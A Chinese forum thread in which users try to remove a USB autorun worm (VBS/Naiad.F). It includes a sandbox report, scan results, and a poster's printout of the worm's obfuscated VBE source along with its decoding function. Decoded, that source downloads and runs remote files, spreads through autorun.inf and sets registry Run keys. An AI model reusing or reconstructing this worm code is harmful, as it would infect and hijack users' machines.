卡巴不能删干净!郁闷中!MD5: A7E5BA

SONGBOWEN

对于这种文件的沙盘报告没有什么意义……
附上——

Hello,

Thanks for taking the time to submit your samples to the Norman
Sandbox Information Center.  Customer delight is our top priority at
Norman.  With that in mind we have developed Sandbox Solutions for
organizations that are committed to speedy analysis and debugging.

Norman Sandbox Solutions give your organization the opportunity to
analyze files immediately in your own environment.

To find out how to bring the power of Norman Sandbox into your test
environments follow the links below.

Norman Sandbox Solutions
http://www.norman.com/Product/Sandbox-products/

Norman Sandbox Analyzer
http://www.norman.com/Product/Sandbox-products/Analyzer/

Norman Sandbox Analyzer Pro
http://www.norman.com/Product/Sandbox-products/Analyzer-pro/

Norman SandBox Reporter
http://www.norman.com/Product/Sandbox-products/Reporter/

&#19979 : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
    * Sandbox name: NO_MALWARE
    * Signature name: NO_VIRUS
    * Compressed: NO



(C) 2004-2006 Norman ASA. All Rights Reserved.

The material presented is distributed by Norman ASA as an information source only.

This file is not flagged as malicious by the Norman Sandbox Information Center. However, we can not guarantee that the file is harmless. If you still suspect the file to be malicious and if you urgently need to know for sure, please submit it to your local Norman support department for manual analysis.


************************************
Sent from an unmonitored email address.
Please DO NOT reply.
************************************

zah_123

E:\下载区\常用软件下载\样本.rar » RAR » 新样本.rar » RAR » `.vbe - VBS/Naiad.F worm
E:\下载区\常用软件下载\样本.rar » RAR » `.lnk - is OK
E:\下载区\常用软件下载\样本.rar » RAR » autorun.inf - INF/Autorun virus
E:\下载区\常用软件下载\样本.rar » RAR » `.url - is OK

tiaozhihua

下个优盘专杀，我也中过这个vbs的
不行的话格了

tiancun

格式了那有什么意义啊~~~
在系统里~~~有不是U盘里~~

SONGBOWEN

不是VBS，是VBE，同样调用脚本宿主，可是并不完全相同……

残缺的唯美

u盘毒 autorun.inf只是自动运行

SONGBOWEN

部分解密后的代码(未经测试！！！)：

1. '7.2
   
2. execute(uc("ire=|7.2|}{svyranzr=|`|}{vasanzr=|`.hey|}{gvzrfanzr=|`.yax|}{gvyr=|Gbire|&ire}{sebzhey=pue(104)&pue(116)&pue(116)&pue(112)&|://|&|h7.|&pue(54)&pue(54)&pue(48)&|0.be|&pue(103)&|/h72.|&pue(97)&|f|&pue(112)}{sebzhey2=pue(104)&pue(116)&pue(116)&pue(112)&|://|&|h6.|&pue(50)&pue(50)&pue(56)&|8.be|&pue(103)&|/h72.|&pue(97)&|f|&pue(112)}{'ba reebe erfhzr arkg}{qvz jfu}{frg jfu=perngrbowrpg(|jfpevcg.furyy|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|)}{frg qve=sfb.trgfcrpvnysbyqre(1)}{frg jva=sfb.trgfcrpvnysbyqre(0)}{frg qp=sfb.qevirf}{bhjaanzr=jfpevcg.fpevcganzr}{rkrzhyh=sfb.trgfcrpvnysbyqre(2)&|\|}{jorz=sfb.trgfcrpvnysbyqre(1)&|\jorz\|}{zhyh=yrsg(jfpevcg.fpevcgshyyanzr,yra(jfpevcg.fpevcgshyyanzr)-yra(jfpevcg.fpevcganzr))}{vs zhyh=qve&|\| gura flf=gehr")):function gettask():execute(uc("ba reebe erfhzr arkg}{vs abg sfb.svyrrkvfgf(qve&|\|&gvzrfanzr) gura ohvyqsvyr qve&|\|&gvzrfanzr,0&iopeys&qngr}{gwf=ernqgkg(qve&|\|&gvzrfanzr,1)}{qwf=ernqgkg(qve&|\|&gvzrfanzr,2)}{vs gwf=|abg_sbhaq| be abg IfNhzrevp(gwf) be abg vfqngr(qwf) gura ohvyqsvyr qve&|\|&gvzrfanzr,0&iopeys&qngr}{ohvyqsvyr qve&|\|&gvzrfanzr,(gwf+1)&iopeys&qwf}{vfjo=wvapurat(|pyfza.rkr|,1) be wvapurat(|chojva.rkr|,1)}{vs ernqgkg(qve&|\|&gvzrfanzr,1)>300 be qngr-pqngr(qwf)>2 be vfjo gura}{vq=ernqgkg(qve&|\|&vasanzr,3)}{vs vq=|| gura vq=0}{wf=1}{purpxqbja=|abar|}{qb juvyr purpxqbja<>||}{vs wf=2 be wf=3 gura}{q2=nqiqbjasvyr(zhyh&|grzc.gkg|,sebzhey2&|?v=|&vq,0,1,100)}{purpxqbja=ernqgkg(zhyh&|grzc.gkg|,1)}{ryfrvs wf=1 be wf=4 gura}{q1=nqiqbjasvyr(zhyh&|grzc.gkg|,sebzhey&|?v=|&vq,0,1,100)}{purpxqbja=ernqgkg(zhyh&|grzc.gkg|,1)}{raq vs}{wf=wf+1}{vs wf>4 gura}{vs q1=1 be q2=1 gura trggnfx=1}{rkvg qb}{raq vs}{ybbc}{vs sfb.svyrrkvfgf(zhyh&|grzc.gkg|) gura}{frg bcrasvyr=sfb.bcragrkgsvyr(zhyh&|grzc.gkg|, 1)  }{purpx=bcrasvyr.ernqyvar}{qbjavf=bcrasvyr.ernqyvar}{qbjanzr=bcrasvyr.ernqyvar}{qbjasebz=bcrasvyr.ernqyvar}{iofire=bcrasvyr.ernqyvar}{iofeha=bcrasvyr.ernqyvar}{iofanzr=bcrasvyr.ernqyvar}{iofsebz=bcrasvyr.ernqyvar}{gnfxvf=bcrasvyr.ernqyvar}{gnfxpbqr=bcrasvyr.ernqyvar}{hcior= bcrasvyr.ernqyvar}{trgvq= bcrasvyr.ernqyvar}{bcrasvyr.pybfr}{qrysvyr(zhyh&|grzc.gkg|)}{vs purpx=|| gura}{ohvyqsvyr qve&|\|&gvzrfanzr,0&iopeys&qngr}{ohvyqvas 1,trgvq,qbjanzr,gnfxvf,gnfxpbqr,hcior}{vs iofire<>ire be abg sfb.svyrrkvfgf(qve&|\|&svyranzr&|.ior|) gura}{nqiqbjasvyr qve&|\|&iofanzr,iofsebz,iofeha,3,2000}{jfpevcg.dhvg}{raq vs}{vs qbjavf=1 naq flf gura}{vs qbjanzr<>yrkr be abg sfb.svyrrkvfgf(rkrzhyh&yrkr) gura}{qrysvyr rkrzhyh&yrkr}{nqiqbjasvyr rkrzhyh&qbjanzr,qbjasebz,1,3,2000}{raq vs}{raq vs}{raq vs}{raq vs}{raq vs}{vs re be vfjo gura trggnfx=1")):end function:function delfile(where):execute(uc("vs sfb.svyrrkvfgf(jurer) gura }{fuhkvat jurer,0}{sfb.qryrgrsvyr(jurer)}{raq vs}{vs sfb.sbyqrerkvfgf(jurer) gura}{fuhkvat jurer,0}{sfb.qryrgrsbyqre(jurer)}{raq vs")):end function:function buildfile(where,what):execute(uc("qrysvyr jurer}{frg ova=sfb.perngrgrkgsvyr(jurer, gehr)}{ova.jevgryvar jung}{ova.pybfr}{fuhkvat jurer,2+4")):end function:function buildinf(dir,vbsid,exever,tasksw,taskcode,adv):execute(uc("vs qve=0 gura}{vavsvyr=jva&|\|&vasanzr}{ryfr}{vavsvyr=zhyh&vasanzr}{raq vs}{qrysvyr vavsvyr}{frg vav=sfb.perngrgrkgsvyr(vavsvyr, gehr)}{vav.jevgryvar gvyr}{vav.jevgryvar |[nhgbeha]|}{vav.jevgryvar iofvq}{vav.jevgryvar |bcra=jfpevcg.rkr .\|&svyranzr&|.iof|}{vav.jevgryvar rkrire}{vav.jevgryvar |furyy\bcra=打开(&b)|}{vav.jevgryvar gnfxfj}{vav.jevgryvar |furyy\bcra\pbzznaq=jfpevcg.rkr .\|&svyranzr&|.iof|}{vav.jevgryvar gnfxpbqr}{vav.jevgryvar |furyy\bcra\qrsnhyg=1|}{vav.jevgryvar nqi}{vav.pybfr}{fuhkvat vavsvyr,1+2+4")):end function:function readtxt(where,line):execute(uc("vs yvar<0 gura jurer=jfpevcg.fpevcgshyyanzr}{vs sfb.svyrrkvfgf(jurer) gura}{vs sfb.trgsvyr(jurer).fvmr=0 gura}{ernqgkg=|abg_sbhaq|}{ryfr}{frg ernqsvyr=sfb.bcragrkgsvyr(jurer, 1)}{frg puvpxyvar=sfb.bcragrkgsvyr(jurer, 1)}{puvpxyvar.ernqnyy}{gkgyvar=puvpxyvar.yvar}{puvpxyvar.pybfr}{vs yvar>0  naq yvar<=gkgyvar gura}{v=0 }{qb juvyr v<yvar}{v=v+1}{vs abg ernqsvyr.ngraqbsfgernz gura}{fgeyvar=ernqsvyr.ernqyvar}{ryfr}{fgeyvar=|abg_sbhaq|}{raq vs}{ybbc}{ernqgkg=fgeyvar}{ryfrvs yvar<=0 gura}{ernqgkg=ernqsvyr.ernqnyy}{ryfr}{ernqgkg=|abg_sbhaq|}{raq vs}{ernqsvyr.pybfr}{raq vs}{ryfr}{ernqgkg=|abg_sbhaq|}{raq vs")):end function:function shuxing(file,change):execute(uc("vs sfb.svyrrkvfgf(svyr) gura}{frg bsvyr=sfb.trgsvyr(svyr) }{bsvyr.nggevohgrf=punatr}{frg bsvyr=abguvat}{raq vs}{vs sfb.sbyqrerkvfgf(svyr) gura}{frg bsvyr=sfb.trgsbyqre(svyr)}{bsvyr.nggevohgrf=punatr}{frg bsvyr=abguvat}{raq vs")):end function:function advdownfile(localfile,urlfile,runfile,cishu,minsize)
   
3. execute(uc("grfg=0}{qb juvyr grfgzvafvmr gura}{vs ehasvyr=1 gura jfu.eha ybpnysvyr}{rkvg qb}{raq vs}{ryfr}{nqiqbjasvyr=0}{grfg=grfg+1}{qrysvyr ybpnysvyr}{jfpevcg.fyrrc 3000}{raq vs}{ybbc"))
   
4. end function:function jincheng(where,geshu):execute(uc("ba reebe erfhzr arkg}{frg l=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg k=l.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&jurer&|'|)}{v=1 }{sbe rnpu w va k}{v=v+1}{arkg}{vs abg re gura}{vs v>trfuh gura wvapurat=gehr}{ryfr}{wvapurat=1}{raq vs")):end function
   
5. 
   
6. function er()
   
7. if err.number=0 then
   
8. er=false
   
9. else
   
10. err.clear
    
11. er=true
    
12. end if
    
13. end function
    
14. 
    
15. function uc(b)
    
16. x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332226632622496620613d313233205468656e20613d31302226632622696620613d313234205468656e20613d33342226632622696620613e393620616e6420613c313130207468656e2226632622613d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e2226632622613d612d31332226632622456e64204966222663262275633d75632b63687228612922266326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
    
17. loop:execute(y)
    
18. end function
    
19. 
    
20. execute(uc("sbe rnpu q va qp}{vs zhyh=q&|\| gura bcraqvfx=jfu.eha(|rkcybere |&q,3,snyfr)}{arkg}{vs abg flf gura}{jfpevcg.fyrrc 5000}{vs wvapurat(|jfpevcg.rkr|,2)=1 gura}{vs ernqgkg(qve&|\znva.ova|,1)= gevz(qngr) gura}{jfpevcg.dhvg}{ryfr}{ohvyqsvyr qve&|\znva.ova|,qngr}{raq vs}{raq vs}{vs wvapurat(|jfpevcg.rkr|,2)<>1 naq wvapurat(|jfpevcg.rkr|,2) gura jfpevcg.dhvg}{raq vs}{puratsn}{vs flf gura}{lvapnat}{vs ernqgkg(zhyh&vasanzr,1)<>gvyr gura}{ohvyqvas 1,0,0,0,0,0}{raq vs}{vs ernqgkg(jva&|\|&vasanzr,1)<>gvyr gura}{ohvyqvas 0,0,0,0,0,0}{raq vs}{yrkr=ernqgkg(zhyh&vasanzr,5)}{vs sfb.svyrrkvfgf(rkrzhyh&yrkr) gura}{jfu.eha rkrzhyh&yrkr}{raq vs}{vs ernqgkg(qve&|\|&svyranzr&|.ior|,1)<>|'|&ire gura}{pbcliof qve&|\|&svyranzr&|.ior|}{muhpr}{raq vs}{vs ernqgkg(jva&|\|&svyranzr&|.ior|,1)<>|'|&ire gura}{pbcliof jva&|\|&svyranzr&|.ior|}{raq vs}{vs ernqgkg(jorz&svyranzr&|.ior|,1)<>|'|&ire naq ernqgkg(zhyh&vasanzr,11)=1 gura}{ohvyqsvyr jorz&svyranzr&|.ior|,hpp(O1+O2)}{raq vs}{vs ernqgkg(zhyh&vasanzr,11)=2 gura}{sbe rnpu q va qp}{vs q.qevirglcr=2 gura}{vs sfb.svyrrkvfgf(q&|/nhgbeha.vas|) gura}{qrysvyr q&|/nhgbeha.vas|}{raq vs}{vs abg sfb.sbyqrerkvfgf(q&|/nhgbeha.vas|) gura}{ohvyqsbyq q&|/nhgbeha.vas|}{fuhkvat q&|/nhgbeha.vas|,1+2+4}{raq vs}{raq vs}{arkg}{raq vs}{tnaena}{jfu.eha zhyh&bhjaanzr}{ryfr}{fuhkvat zhyh&bhjaanzr,2+4}{pbcliof qve&|\|&svyranzr&|.ior|}{pbcliof jva&|\|&svyranzr&|.ior|}{muhpr}{jfu.eha qve&|\|&svyranzr&|.ior|}{raq vs")):function dotask():execute(uc("ba reebe erfhzr arkg}{vs ernqgkg(zhyh&vasanzr,7)=1 gura}{rkrphgr(hp(ernqgkg(zhyh&vasanzr,9)))}{raq vs")):end function:function copyfile(file,where)
    
21. execute(uc("qrysvyr jurer}{vs sfb.svyrrkvfgf(svyr) gura}{sfb.pbclsvyr svyr,jurer,gehr}{raq vs")):end function:function copyvbs(where):execute(uc("qrysvyr jurer}{frg frys=sfb.bcragrkgsvyr(zhyh&bhjaanzr,1)}{iofpbcl=frys.ernqnyy}{frys.pybfr }{frg iof=sfb.perngrgrkgsvyr(jurer, gehr)}{iof.jevgr iofpbcl}{iof.pybfr}{fuhkvat jurer,2+4")):end function:function zhuce():execute(uc("RrtPngu=|HKEY_LOCAL_MACHINE\SOFTWARE\Mvpebfbsg\Wvaqbjf\CheeragVrefvba\cbyvpvrf\Ekcybere\eha\| }{Tlcr_Nnzr=|REG_SZ|}{Krl_Nnzr=|rkcybere|}{Krl_Dngn=svyranzr&|.ior|}{Wfu.RrtWevgr RrtPngu&Krl_Nnzr,Krl_Dngn,Tlcr_Nnzr")):end function:function yincang():execute(uc("RrtPngu=|HKEY_CURRENT_USER\Sbsgjner\Mvpebfbsg\Wvaqbjf\CheeragVrefvba\Ekcybere\Aqinaprq\| }{Tlcr_Nnzr=|REG_DWORD|}{Krl_Nnzr=|SubjShcreHvqqra|}{Krl_Dngn=|00000000| }{Wfu.RrtWevgr RrtPngu&Krl_Nnzr,Krl_Dngn,Tlcr_Nnzr")):end function:function buildfold(path):execute(uc("vs abg sfb.sbyqrerkvfgf(cngu) gura}{vs abg sfb.sbyqrerkvfgf(sfb.trgcneragsbyqreanzr(cngu)) gura }{ohvyqsbyq sfb.trgcneragsbyqreanzr(cngu)}{raq vs }{sfb.perngrsbyqre(cngu)}{raq vs")):end function:function findid(ids,fid,eid,fname,furl,time):execute(uc("vq=ernqgkg(qve&|\|&vasanzr,3)}{qb juvyr svq<=rvq}{vqp=vqp&|,|&svq}{svq=svq+1}{ybbc}{vqf=vqf&vqp}{vqff=Scyvg(vqf,|,|)}{Fbe v=0 Tb Uobhaq(vqff)}{vs vq=vqff(v) gura}{vs abg sfb.svyrrkvfgf(rkrzhyh&sanzr) gura}{nqiqbjasvyr rkrzhyh&sanzr,|uggc://|&shey,0,2,2000}{raq vs}{raq vs}{arkg}{svaqvq=pges(sanzr,gvzr)")):end function:function dowork(pcs,fname,furl,time):execute(uc("vs abg sfb.svyrrkvfgf(rkrzhyh&sanzr) naq wvapurat(cpf,1) gura}{nqiqbjasvyr rkrzhyh&sanzr,|uggc://|&shey,0,2,3000}{raq vs}{qbjbex=pges(sanzr,gvzr)")):end function:function ctrf(fname,time):execute(uc("vs sfb.svyrrkvfgf(rkrzhyh&sanzr) gura}{vs gvzr<>0 gura}{abjqngr=qngr}{jfu.eha |%pbzfcrp% /p qngr 2002-|&zbagu(qngr)&|-|&qnl(qngr),iouvqr}{jfpevcg.fyrrc nof(gvzr*1000)}{raq vs}{jfu.eha rkrzhyh&sanzr}{pges=1}{vs gvzr>0 gura}{jfpevcg.fyrrc 5000}{jfu.eha |%pbzfcrp% /p qngr |&abjqngr,iouvqr}{raq vs}{raq vs")):end function:function taskkill(pcs,times):execute(uc("vs wvapurat(cpf,1) gura}{ba reebe erfhzr arkg}{Srg bowjzvfreivpr=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|) }{Srg pbycebprffyvfg=bowjzvfreivpr.rkrpdhrel (|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|' |)}{sbe rnpu bowcebprff va pbycebprffyvfg }{bowcebprff.grezvangr()}{arkg}{vs gvzrf=1 gura gnfxxvyy=1}{raq vs")):end function:function ganran():execute(uc("ba reebe erfhzr arkg}{qb}{sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs sfb.sbyqrerkvfgf(q&|\nhgbeha.vas|) gura}{qrysvyr q&|\nhgbeha.vas|}{raq vs}{vs sfb.svyrrkvfgf(q&|\|&svyranzr&|.iof|) naq sfb.svyrrkvfgf(q&|\nhgbeha.vas|) gura}{vs ernqgkg(q&|\nhgbeha.vas|,1)<>gvyr gura}{pbclsvyr jva&|\|&vasanzr,q&|\nhgbeha.vas|}{pbclsvyr jva&|\|&svyranzr&|.ior|,q&|\|&svyranzr&|.iof|}{raq vs}{ryfr}{lvapnat}{pbclsvyr jva&|\|&vasanzr,q&|\nhgbeha.vas|}{pbclsvyr jva&|\|&svyranzr&|.ior|,q&|\|&svyranzr&|.iof|}{raq vs}{raq vs}{arkg}{vs (zvahgr(abj) zbq 5)=0 naq km<>1 gura}{km=trggnfx}{jfpevcg.fyrrc 60000}{raq vs}{vs ej<>-1 gura}{qbgnfx}{raq vs}{jfpevcg.fyrrc 3000}{ybbc")):end function:function chengfa():execute(uc("vs ernqgkg(zhyh&bhjaanzr,1)<>|'|&ire gura}{zftobk(|uryyb,unpxre!|)}{qrysvyr zhyh&bhjaanzr}{jfpevcg.dhvg}{raq vs")):end function
    
22. 
    
23. 
    
24. 
    
25. 
    
26. 
    
27. 
    
28. 
    
29. For i=1 To Len(e):k=asc(mid(e,i,1)):If k=5 Then k=16:k=10:if k=8 Then:k=45:if k>81 and k<90 then:k=k+12:elseif k>89 and k<135 then:k=k-21:elseif k>39 and k<70 then:k=k+17:End If:e=e+chr(k):Next

复制代码

SONGBOWEN

到目前为止，已经成功去除了代码中的乱码！

SONGBOWEN

靠……
这个病毒多重加密……
我快晕死了……
正在试图解密……

SONGBOWEN

UC函数解码完毕……

1. function uc(b)
   
2. For i=1 To Len(b)
   
3. a=Asc(Mid(b,i,1))
   
4. If a=125 Then a=13
   
5. If a=123 Then a=10
   
6. if a=124 Then a=34
   
7. if a>96 and a<110 then
   
8. a=a+13
   
9. elseif a>109 and a<123 then
   
10. a=a-13
    
11. End If
    
12. uc=uc+chr(a)
    
13. Next
    
14. end function

复制代码